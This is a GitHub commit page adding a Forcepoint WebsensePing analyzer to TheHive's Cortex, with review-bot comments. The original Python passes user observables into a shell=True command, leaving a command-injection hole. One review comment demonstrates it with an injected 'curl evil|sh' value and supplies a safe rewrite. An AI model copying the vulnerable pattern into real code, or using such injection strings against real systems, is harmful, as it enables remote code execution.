Merge pull request #836 from TheHive-Project/feature/Forcepoint_WebsensePing

Add forcepoint websense ping Analyzer
Arcuri Davide 2020-08-10 16:17:21 +02:00 committed by GitHub
commit 296ba5b806
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
8 changed files with 231 additions and 0 deletions


@ -0,0 +1,172 @@
{
"name":
"ForcepointWebsensePing",
"version":
"1.0",
"author":
"Andrea Garavaglia, Davide Arcuri - LDO-CERT",
"url":
"https://github.com/TheHive-Project/Cortex-Analyzers",
"license":
"AGPL-V3",
"description":
"Use ForcepointWebsensePing to determine which category a certain URL is assigned to.",
"dataTypeList": ["url", "ip", "domain", "fqdn"],
"command":
"ForcepointWebsensePing/forcepointwebsenseping.py",
"baseConfig":
"ForcepointWebsensePing",
"config": {
"service": "lookup"
},
"configurationItems": [{
"name":
"hostname",
"description":
"Forcepoint remote Filtering Service",
"type":
"string",
"multi":
false,
"required":
true
}, {
"name": "timeout",
"description": "WebsensePing timeout-secs",
"type": "number",
"multi": false,
"required": true,
"defaultValue": 10
}, {
"name": "path",
"description": "WebsensePing path",
"type": "string",
"multi": false,
"required": true,
"defaultValue": "/opt/Websense/bin"
}, {
"name":
"malicious_categories",
"description":
"List of Forcepoint categories to be considered as malicious",
"type":
"string",
"multi":
true,
"required":
true,
"defaultValue": [
"Dynamic DNS", "Elevated Exposure", "Emerging Exploits",
"Extended Protection", "Newly Registered Websites",
"Suspicious Content", "Advanced Malware Command and Control",
"Advanced Malware Payloads", "Botnets", "Bot Networks",
"Compromised Websites", "Malicious Web Sites",
"Custom-Encrypted Uploads", "Files Containing Passwords",
"Keyloggers", "Malicious Embedded Link",
"Malicious Embedded Iframe", "Malicious Websites",
"Mobile Malware", "Phishing and Other Frauds",
"Potentially Exploited Documents", "Potentially Unwanted Software",
"Spyware", "Suspicious Embedded Link",
"Elevated Exposure Newly Registered Websites",
"Unauthorized Mobile Marketplaces", "User-Defined"
]
}, {
"name":
"suspicious_categories",
"description":
"List of Forcepoint categories you would consider as suspicious",
"type":
"string",
"multi":
true,
"required":
true,
"defaultValue": [
"Uncategorized", "Parked Domain", "Hacking", "Proxy Avoidance",
"Intolerance", "Abused Drugs", "Adult Content", "Adult Material",
"Advertisements", "Computer Security", "Drugs", "Dynamic Content",
"Illegal or Questionable", "Marijuana", "Militancy and Extremist",
"Network Errors", "Peer-to-Peer File Sharing",
"Personal Network Storage and Backup", "Private IP Addresses",
"Sex", "Tastelesstopics or to improper language", "Violence",
"Web and Email Spam", "Security"
]
}, {
"name":
"safe_categories",
"description":
"List of Forcepoint categories you would consider as safe",
"type":
"string",
"multi":
true,
"required":
true,
"defaultValue": [
"Business and Economy", "Bandwidth", "Education", "Government",
"News and Media", "Productivity", "Religion",
"Society and Lifestyles", "Special Events",
"Information Technology", "Abortion", "Advocacy Groups",
"Entertainment", "Facebook Apps ", "Facebook Chat",
"Facebook Commenting", "Facebook Events", "Facebook Friends",
"Facebook Games", "Facebook Groups", "Facebook Mail",
"Facebook Photo Upload", "Facebook Posting", "Facebook Questions",
"Facebook Video Upload", "File Download Servers",
"LinkedIn Connections", "LinkedIn Jobs", "LinkedIn Mail",
"LinkedIn Updates", "Twitter Follow", "Twitter Mail",
"Twitter Posting", "YouTube Commenting", "YouTube Sharing",
"YouTube Video Upload", "Alternative Journals",
"Application and Software Download", "Blog Commenting",
"Blog Posting", "Blogs and Personal Sites", "Classified Posting",
"Social and Affiliation Organizations", "Social Networking",
"Social Organizations", "Social Web - Facebook",
"Social Web - LinkedIn", "Social Web - Twitter",
"Social Web - YouTube", "Social Web Controls - Various", "Sports",
"Entertainment Video", "Financial Data and Services",
"Instant Messaging", "Job Search", "Shopping", "Travel",
"Vehicles", "Search Engines and Portals", "Alcohol and Tobacco",
"Collaboration Office", "Content Delivery Networks",
"Cultural Institutions", "Educational Institutions",
"Educational Materials", "Educational Video", "General Email",
"Health", "Hobbies", "Gay or Lesbian or Bisexual Interest",
"Gambling", "Games", "Hosted Business Applications",
"Internet Auctions", "Internet Communication",
"Internet Radio and TV", "Internet Telephony",
"Media File Download", "Message Boards and Forums",
"Non-Traditional Religion", "Nudity", "Nutrition", "Office - Apps",
"Office - Documents", "Office - Drive", "Office - Mail",
"Office Category used to manage the Office domain",
"Online Brokerage and Trading", "Organizational Email",
"Personals and Dating", "Pay-to-Surf", "Political Organizations",
"Prescribed Medications", "Pro-Choice", "Pro-Life",
"Professional and Worker Organizations", "Real Estate",
"Reference Materials", "Restaurants and Dining",
"Service and Philanthropic Organizations", "Sex Education",
"Lingerie and Swimsuit", "Sport Hunting and Gun Clubs",
"Streaming Media", "Surveillance", "Text and Media Messaging",
"Traditional Religions", "Viral Video", "Weapons", "Web Analytics",
"Web and Email Marketing", "Web Chat", "Web Collaboration",
"Web Hosting", "Web Images", "Web Infrastructure",
"Website Translation"
]
}],
"registration_required":
true,
"subscription_required":
true,
"free_subscription":
false,
"service_homepage":
"https://www.forcepoint.com",
"service_logo": {
"path": "assets/forcepoint_logo.png",
"caption": "logo"
},
"screenshots": [{
"path": "assets/ForcepointWebsensePing_long.png",
"caption": "ForcepointWebsensePing long report sample"
}, {
"path": "assets/ForcepointWebsensePing_short.png",
"caption:": "ForcepointWebsensePing mini report sample"
}]
}
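Review bot: The second screenshot entry uses the key `"caption:"` (with a stray colon inside the quotes) where the first uses `"caption"`, so that caption will be ignored by anything reading this descriptor; change it to `"caption": "ForcepointWebsensePing mini report sample"`. Two of the category defaults also look off: `"Facebook Apps "` carries a trailing space and `"Tastelesstopics or to improper language"` is a mangled name, and since the analyzer's summary() compares the returned category string for exact membership in these lists, such entries can never match. The `"config": {"service": "lookup"}` block is not read by the analyzer code in this commit as far as I can see; either drop it or note why it is there.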


@ -0,0 +1,8 @@
Categorize domain names, URL, fqdn, IP addresses using the popular [Forcepoint Master Database](https://www.forcepoint.com/it/product/feature/master-database-url-categories) service .
#### Requirements
You need a [valid Forcepoint license](https://support.forcepoint.com/KBArticle?id=000016428#WebsensePing/) to use the analyzer:
- Install WebsensePing on instance where you will run this analyzer
- Provide hostname of remote Filtering Service as a value for the `hostname` parameter and timeout as a value for the `timeout` parameter.



@ -0,0 +1,47 @@
#!/usr/bin/env python3
# encoding: utf-8
import subprocess
from cortexutils.analyzer import Analyzer
class WebsensePingAnalyzer(Analyzer):
def __init__(self):
Analyzer.__init__(self)
self.hostname = self.get_param('config.hostname', None)
self.timeout = self.get_param('config.timeout', None)
self.path = self.get_param('config.path', None)
def summary(self, raw):
taxonomies = []
if raw.get('Categories', None):
value = raw['Categories']
if value in self.get_param('config.malicious_categories', []):
level = "malicious"
elif value in self.get_param('config.suspicious_categories', []):
level = "suspicious"
elif value in self.get_param('config.safe_categories', []):
level = "safe"
else:
level = "info"
taxonomies.append(self.build_taxonomy(level, "Forcepoint", "WebsensePing", value))
return {"taxonomies": taxonomies}
def run(self):
Analyzer.run(self)
if self.data_type in ("url", "ip", "domain","fqdn"):
data = self.get_param('data', None, 'Data is missing')
command = "export LD_LIBRARY_PATH={} && {}/WebsensePing -m 25 -url {} -s {} -t {}".format(self.path, self.path, data, self.hostname, self.timeout)
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = [line.decode('utf8') for line in process.stdout]
report = {k.strip():v.strip() for k,v in [x.split("=") for x in output if x.find("=") != -1]}
self.report(report)
else:
self.error('Invalid data type')
if __name__ == '__main__':
WebsensePingAnalyzer().run()
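Review bot: The `command` string in run() interpolates the observable (`data`, a URL/domain/IP submitted by TheHive users) into a `shell=True` command, so an observable like `http://x.example/;curl evil|sh` executes arbitrary commands on the Cortex host; build an argv list and call subprocess.run without a shell, passing `LD_LIBRARY_PATH` via `env=` instead of `export ... &&` (this needs `import os` at the top of the file). The same function never checks the exit status or reads stderr, so a failed ping or a missing binary reports an empty dict as a successful result, and the `k, v` unpacking of `x.split("=")` raises ValueError on any output line containing more than one `=` (e.g. if WebsensePing echoes a URL with a query string) — `str.partition` avoids that. The Python side also enforces no deadline of its own even though `timeout` is configured; `-t` is only handed to the binary. I recall that cortexutils' `self.error()` exits the process, so the `return` after it is belt-and-braces; verify against the cortexutils version pinned for this repo.
```python
def run(self):
    """Run WebsensePing against the observable and report the key=value output as a dict."""
    Analyzer.run(self)
    if self.data_type not in ("url", "ip", "domain", "fqdn"):
        self.error('Invalid data type')
        return
    data = self.get_param('data', None, 'Data is missing')
    # argv list, no shell: the observable never reaches a command interpreter
    argv = [os.path.join(self.path, "WebsensePing"), "-m", "25",
            "-url", data, "-s", self.hostname, "-t", str(self.timeout)]
    env = dict(os.environ, LD_LIBRARY_PATH=self.path)
    try:
        proc = subprocess.run(argv, env=env, stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE,
                              timeout=float(self.timeout) + 5)
    except (OSError, subprocess.TimeoutExpired, ValueError) as exc:
        self.error('WebsensePing failed: {}'.format(exc))
        return
    if proc.returncode != 0:
        self.error('WebsensePing exited with {}: {}'.format(
            proc.returncode, proc.stderr.decode('utf8', 'replace').strip()))
        return
    report = {}
    for line in proc.stdout.decode('utf8', 'replace').splitlines():
        key, sep, value = line.partition("=")
        if sep:  # keep only key=value lines; partition tolerates extra '=' in the value
            report[key.strip()] = value.strip()
    self.report(report)
```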


@ -0,0 +1 @@
cortexutils


@ -0,0 +1,3 @@
<span class="label" ng-repeat="t in content.taxonomies" ng-class="{'info': 'label-info', 'safe': 'label-success', 'suspicious': 'label-warning', 'malicious':'label-danger'}[t.level]">
{{t.namespace}}:{{t.predicate}}="{{t.value}}"
</span>